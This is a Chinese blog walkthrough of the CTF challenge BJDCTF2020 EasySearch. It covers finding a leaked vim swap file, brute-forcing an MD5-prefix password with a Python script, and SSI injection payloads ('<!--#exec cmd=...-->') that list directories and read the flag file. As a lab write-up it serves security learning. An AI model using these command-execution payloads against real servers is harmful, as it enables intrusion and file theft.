buuCTF [BJDCTF2020]EasySearch 1

最新推荐文章于 2025-03-03 22:53:10 发布
最新推荐文章于 2025-03-03 22:53:10 发布
阅读量2.1k 收藏 5
点赞数 4
CC 4.0 BY-SA版权
分类专栏: buuctf ctf 刷题日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45642610/article/details/115689130
本文介绍了参与CTF比赛时遇到的一个挑战,涉及到目录扫描、PHP备份文件(index.php.swp)的发现以及SHTML文件的命令注入。通过寻找满足MD5条件的密码,成功登录后利用SHTML的<!--#execcmd=命令-->&gt;特性进行文件操作,最终通过目录遍历和文件读取拿到FLAG。整个过程展示了Web安全中的漏洞利用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

buuCTF [BJDCTF2020]EasySearch 1

进去后是这样
在这里插入图片描述
扫后台发现index.php.swp备份。
在这里插入图片描述
这里吐槽一下。我用dirsearch扫了3次都没出来,最后用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。

要求password的md5值的前6个字符为6d0bc1。敲代码(python):

from hashlib import md5

for i in range(10000000):
    if md5(str(i).encode('utf-8')).hexdigest()[:6] == '6d0bc1':
        print(i)

2020666
2305004
9162671
前三个,选一个。

username=1&password=2020666

在这里插入图片描述
抓包看响应包头文件,或者直接看网络,发现一个url。
在这里插入图片描述

输入网址
在这里插入图片描述

这是个shtml。具体自己查查,简单来说就是能根据命令动态回显网页的某个部分,比如时间。可以注入,用来远程命令执行。
格式:

<!--#exec cmd="命令"-->

这里的username是个注入点。
直接cat /flag没反应
查看目录

username=<!--#exec cmd="ls"-->&password=2020666

在这里插入图片描述

在这里插入图片描述
原来shtml的用户名就回显了指令。
注意这里的shtml根据指令的不同而不同,所以说每次执行了指令都要复制粘贴shtml网址重新载入。刷新没变化。
看看上级目录

username=<!--#exec cmd="ls ../"-->&password=2020666

在这里插入图片描述打开flag_990c66bf85a09c664f0b6741840499b2

username=<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->&password=2020666

注意因为是上级目录,所以要保留../
在这里插入图片描述

拿到flag。此时英语老师会跟你说结尾可以用什么表达?

[BJDCTF2020]EasySearch1
qq_45829213的博客
01-26 3105
buuctf 源码泄露 ssi远程命令执行漏洞
BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 431
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也存在sql注入。直接御剑描(buuctf上的题要调线程和超时,我是线程10超时15,然会被平台禁掉)。出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
BUUCTF-WEBBJDCTF2020EasySearch 1
qq_36410265的博客
02-08 470
SSI(服务端包含)
BUUCTF [BJDCTF2020]EasySearch
qq_53863234的博客
12-05 2944
Apache SSI 远程命令执行漏洞
BUUCTF [BJDCTF2020] EasySearch
Senimo
01-06 817
BUUCTF [BJDCTF2020] EasySearch 考点: Apache SSI 远程命令执行 shtml文件 启动环境: 一个登录框,尝试了弱密码与万能密码,均无结果,继续对题目进行信息收集,使用ctf-wscan描目录: python3 ctf-wscan.py http://c4567f9c-24a4-42fd-a60f-1e02b2aa1f07.node3.buuoj.cn/ 得到描结果,其存在index.php.swp文件: <?php ob_start(); f
buuctf.web 32-64
m0_73889365的博客
02-18 926
buuctf.web 刷题
[BJDCTF2020]EasySearch 1
ubaichu的博客
07-12 503
[BJDCTF2020]EasySearch 1 题目详解
BUU-WEB-[BJDCTF2020]EasySearch
qq_24033605的博客
05-19 443
[BJDCTF2020]EasySearch 描找到主页的备份源码。 index.php.swp 1.passwd的md5前6位是6d0bc1 2. 成功提交后生成一个shtml文件。(SSI远程命令执行) 爆破一下,看看有哪些md5的前六位符合。 import hashlib a = "0123456789" for o in a: for p in a: for q in a: for r in a: for s i
buuctf-EasySearch
m0_62094846的博客
05-14 340
特意搜了下题目,以为有什么提示,结果是一个搜索插件 然后用注入,爆破密码,都没用 描后台发现index.php.swp备份(我用御剑没出来,下次要安装一些其他的描工具,用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。) <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0..
BUUCTF [BJDCTF2020]EasySearch1
最新发布
2401_88083440的博客
03-03 718
写一篇文章来学习一下 ssi 注入 以及 dirmap 工具的使用看到这两个框框没什么想法,边探索边下目录吧。显示前端报错,先禁用了js,然后又尝试抓了下包,没有发现什么,只好看看出来的目录了,最终出来了的:index.php.swp (用dirmap出来的)虽然两个都显示username,但只有第一个才是真正的$_POST[username]看一下代码逻辑:1.首先判断输入的password 的前6位是否为6d0bc12.如果满足的话就执行打开文件、写入文件、关闭文件的功能。
1.buuctf [BJDCTF2020]EasySearch
2401_86760082的博客
02-16 665
进入题目页面如下尝试输入弱口令密码都显示错误看题目是search,描一下根目录试试得到源码进行一下代码审计代码仅对用户输入的密码进行 MD5 哈希处理并截取前 6 位与预设的哈希前缀进行比较可以通过简单的暴力破解或彩虹表攻击来找到满足条件的密码由于只需要匹配 MD5 哈希的前 6 位,可以编写脚本,尝试同的密码组合,计算其 MD5 哈希值并截取前 6 位进行比较,直到找到满足条件的密码或使用预先计算好的 MD5 哈希值和对应的明文密码的彩虹表,查找哈希值前 6 位为6d0bc1的密码。
[BJDCTF2020]EasySearch 1(shtml)
weixin_45577185的博客
10-16 295
描到后台后index.php.swp文件泄露,访问一下得到源码 (反正我是没有到,wuwuwu~) 可以看到password的md5值的前六位要等于6d0bc1 会写哈,用用别人的 import hashlib for i in range(1000000000): a = hashlib.md5(str(i).encode('utf-8')).hexdigest() if a[0:6] == '6d0bc1': print(i) print(a)
[BJDCTF2020]EasySearch
SopRomeo的博客
03-31 3819
sql注入没回显,描一下后台,最后用御剑描到了index.php.swp 进去是一段源代码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $c...
BUUCTF:[BJDCTF2020]EasySearch
末初 · mochu7
10-06 760
运行之后在响应头反馈了访问URL。在当前目录的上一级发现flag。访问即可发现成功执行。
BUUCTF [BJDCTF2020]EasySearch 1
qq_56313338的博客
09-25 236
.swp” 后缀通常用于表示 Vim(一种文本编辑器)的交换文件。Vim 是一个强大的文本编辑器,它在编辑文件时会创建交换文件以确保文件内容的安全性。
BUUCTF WEB easysearch
qq_41696858的博客
01-07 2075
由于buuctf独特的防机制,建议加上 -s -t参数,等个10分钟 查看index.php.swp查看源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[
buuctf [BJDCTF2020]这是base??
01-03
### BUUCTF BJDCTF2020 Base题目解析 #### 题目描述 在BUUCTF平台上的BJDCTF2020比赛中,有一个名为“过如此”的基础题目。此题目的核心在于理解并利用PHP中的`file_get_contents`函数以及正则表达式的特性。 ##...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值